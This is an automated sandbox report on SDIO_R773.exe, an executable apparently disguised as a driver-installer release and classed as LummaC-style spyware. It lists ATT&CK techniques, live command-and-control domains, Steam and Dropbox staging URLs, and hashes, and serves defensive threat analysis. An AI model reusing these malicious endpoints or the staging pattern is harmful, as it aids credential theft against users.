              Source: Yara match | File source: Process Memory Space: SDIO_R773.exe PID: 7528, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: SDIO_R773.exe PID: 7528, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 115 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Peripheral Device Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

              Source | Detection | Scanner | Label | Link
              SDIO_R773.exe | 6% | Virustotal | | Browse
              SDIO_R773.exe | 5% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              nuttyshopr.biz | 100% | Avira URL Cloud | malware |
              http://www.snappy-driver-installer.org/downloads/SDIO_Update.torrenthttp://www.snappy-driver-install | 0% | Avira URL Cloud | safe |
              spookycappy.biz | 100% | Avira URL Cloud | malware |
              https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com:443/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtn | 0% | Avira URL Cloud | safe |
              https://sputnik-1985.com/apiQ | 100% | Avira URL Cloud | malware |
              https://sputnik-1985.com:443/api | 100% | Avira URL Cloud | malware |
              https://status.dropbox.com | 0% | Avira URL Cloud | safe |
              https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/dE | 0% | Avira URL Cloud | safe |
              https://sputnik-1985.com/apiW | 100% | Avira URL Cloud | malware |
              fraggielek.biz | 100% | Avira URL Cloud | malware |
              https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/ | 0% | Avira URL Cloud | safe |
              littlenotii.biz | 100% | Avira URL Cloud | malware |
              https://sputnik-1985.com/apii | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
edge-block-www-env.dropbox-dns.com | 162.125.66.15 | true | false | | high
www-env.dropbox-dns.com | 162.125.66.18 | true | false | | high
sputnik-1985.com | 104.21.64.1 | true | false | | high
littlenotii.biz | unknown | unknown | true | | unknown
fraggielek.biz | unknown | unknown | true | | unknown
nuttyshopr.biz | unknown | unknown | true | | unknown
grandiouseziu.biz | unknown | unknown | true | | unknown
marketlumpe.biz | unknown | unknown | true | | unknown
spookycappy.biz | unknown | unknown | true | | unknown
truculengisau.biz | unknown | unknown | true | | unknown
www.dropbox.com | unknown | unknown | false | | high
uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com | unknown | unknown | true | | unknown
punishzement.biz | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
spookycappy.biz | true | Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199724331900 | false | | high
nuttyshopr.biz | true | Avira URL Cloud: malware | unknown
fraggielek.biz | true | Avira URL Cloud: malware | unknown
littlenotii.biz | true | Avira URL Cloud: malware | unknown
                                                                                                                                                                              high
                                                                                                                                                                              https://login.steampowered.com/SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allSDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/legal/SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://docsend.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://sputnik-1985.com/apiQSDIO_R773.exe, 00000000.00000003.2005003653.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067744653.0000000000D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoSDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://sputnik-1985.com/apiWSDIO_R773.exe, 00000000.00000003.1958490684.00000000047DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://store.steampowered.com/SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.certum.pl/CPS0SDIO_R773.exefalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://sputnik-1985.com/apiiSDIO_R773.exe, 00000000.00000003.2005093546.00000000047DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://127.0.0.1:27060SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgSDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.dropbox.com/jsSDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://docs.google.com/document/fsip/SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.dropbox.com/scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjSDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://api.steampowered.com/SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://store.steampowered.com/mobileSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs
IP              Domain                               Country        ASN    ASN Name         Malicious
162.125.66.18   www-env.dropbox-dns.com              United States  19679  DROPBOXUS        false
104.102.49.254  steamcommunity.com                   United States  16625  AKAMAI-ASUS      false
104.21.64.1     sputnik-1985.com                     United States  13335  CLOUDFLARENETUS  false
162.125.66.15   edge-block-www-env.dropbox-dns.com   United States  19679  DROPBOXUS        false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589146
Start date and time: 2025-01-11 11:55:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SDIO_R773.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/2@12/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SDIO_R773.exe, PID 7528 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        05:56:09API Interceptor11x Sleep call for process: SDIO_R773.exe modified
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        162.125.66.18Message.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          https://docsend.com/view/sutbz9ibkqcisjtvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                            104.21.64.1SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.mffnow.info/0pqe/
                                                                                                                                                                                                                                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.vilakodsiy.sbs/w7eo/
                                                                                                                                                                                                                                            1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.mzkd6gp5.top/utww/
                                                                                                                                                                                                                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.mzkd6gp5.top/3u0p/
                                                                                                                                                                                                                                            Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • ordrr.statementquo.com/QCbxA/
                                                                                                                                                                                                                                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                            • adsfirm.com/administrator/index.php
                                                                                                                                                                                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                            • www.bser101pp.buzz/v89f/
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            sputnik-1985.com4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.16.1
                                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.96.1
                                                                                                                                                                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.32.1
                                                                                                                                                                                                                                            HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            FeedStation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                            DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            edge-block-www-env.dropbox-dns.comvEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.65.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                            • 162.125.69.15
                                                                                                                                                                                                                                            steamcommunity.com176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            www-env.dropbox-dns.comMessage.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            https://docsend.com/view/sutbz9ibkqcisjtvGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Jeffparish.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.3.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            Remittance details.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            • 104.21.64.1
                                                                                                                                                                                                                                            • 162.125.66.18
                                                                                                                                                                                                                                            • 162.125.66.15
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
Full-Ver_Setup.exe: malicious, LummaC Stealer
                                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (410)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1005
                                                                                                                                                                                                                                            Entropy (8bit):4.9698836036542575
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:hYjkspFAunWDg5+DCpdgc6olL3lX8YDUdwlKXG/PEuXW:4plVl68lL14
                                                                                                                                                                                                                                            MD5:1E8AC4ADD8592CABAA50DFB8581608D2
                                                                                                                                                                                                                                            SHA1:EBE49951ACE4227AB233D9FD6218A9D8907118B8
                                                                                                                                                                                                                                            SHA-256:83622A0678D9F991CE9E6F9F2690A93504E2FC58128156C4C4B2358B372572ED
                                                                                                                                                                                                                                            SHA-512:8A3F7BADCF10D38D9545174651CDE383F5C035578C9D3D451DB2FFF8CC73907582EA1B233BB9F68FA988B5D615A601ECB12ECC735D7645725A7F489AB5A15696
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">.<meta name="viewport" content="width=device-width, initial-scale=1" />.<title>Dropbox - 400</title>.<link href="https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css" rel="stylesheet" type="text/css"/>.<link rel="shortcut icon" href="https://cfl.dropboxstatic.com/static/images/favicon.ico"/>.</head>.<body>.<div class="figure">.<img src="https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg" alt="Error: 400"/>.</div>.<div id="errorbox">.<h1>Error (400)</h1>Something went wrong. Don't worry, your files are still safe and the Dropbox team has been notified. Check out our <a href="https://status.dropbox.com">Status Page</a> to see if there is a known incident, our <a href="https://www.dropbox.com/help">Help Center</a> and <a href="https://forums.dropbox.com">forums</a> for help, or head back to <a href="https://www.dropbox.com/home">home</a>..</div>..</body>.</h
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                                            Entropy (8bit):4.462936224014049
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:LIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:MXD94+WlLZMM6YFHg+n
                                                                                                                                                                                                                                            MD5:FDA89E1A1A4B80AF60C74795B62C0406
                                                                                                                                                                                                                                            SHA1:0DFF311741FDE402EB57EEE1C53A9D12A1E1C138
                                                                                                                                                                                                                                            SHA-256:1D550192CDCEAEAFF52791FD1BA59969DBB5A80383B488AD0F9C705989B61D95
                                                                                                                                                                                                                                            SHA-512:3BFBA0DDCDA44F79B923CE467323E4D5FA8B027444F6000E917822F4B62C5C8B9A5BDEEBB56F4758EBF86180F750529D702FBF4578AB282A3EBD4653FF1DE356
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...{.d...............................................................................................................................................................................................................................................................................................................................................e.O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):6.657834591055657
                                                                                                                                                                                                                                            TrID:
